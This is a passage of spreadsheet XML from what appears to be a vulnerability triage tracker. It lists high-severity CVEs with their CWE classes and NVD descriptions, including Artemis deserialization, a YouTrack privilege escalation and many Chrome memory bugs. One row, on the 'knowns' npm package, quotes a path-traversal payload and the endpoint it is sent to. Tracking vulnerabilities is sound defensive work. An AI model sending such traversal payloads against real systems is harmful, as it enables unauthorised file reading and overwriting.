      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86404</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>EAP's Artemis deserialization configuration permits deserialization by default. ObjectMessage.getObject() uses ObjectInputStreamWithClassLoader, which implements allow-list/block-list filtering via its checkSecurity()/isTrustedType() method. However, by default both allow-list and block-list are empty. When the allow-list is empty (size == 0), isTrustedType() returns true for ALL classes. This means all classes are deserializable by default.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86404</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86482</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 unchecked group membership changes allowed privilege escalation</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86482</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86775</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>knowns (npm package) versions &lt;= 0.29.1 contain a path traversal vulnerability in the Document API. The HTTP handler in internal/server/routes/docs.go normalizes the user-supplied document path with cleanDocPath(), which strips leading/trailing slashes and the .md suffix but does not neutralize ../ traversal sequences, and internal/storage/doc_store.go then builds the target path with filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md") without verifying that the resolved path remains inside the documents directory. In the default deployment, where the Management API is unauthenticated and bound to all interfaces, a remote unauthenticated attacker can supply a traversal payload (for example {"path": "../../../../tmp/knowns_pwn_marker"} to POST /api/docs, or an encoded path to GET /api/docs/...) to read, create, overwrite, or delete arbitrary files with a .md extension anywhere on the host filesystem and to create arbitrary directories via os.MkdirAll. This can expose sensitive data stored in other projects' documentation, corrupt or destroy files, and provide an arbitrary-write primitive that may be chained toward code execution. The issue is fixed in version 0.30.0.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86775</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87430</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87430</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87433</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87433</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87440</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87440</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87444</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87444</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87460</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87460</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87489</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87489</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87536</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87536</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87542</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>Use after free in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87542</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87569</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Views in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87569</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87570</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87570</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87579</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87579</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87585</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>Double free in PDFium in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87585</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87587</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87587</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87588</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
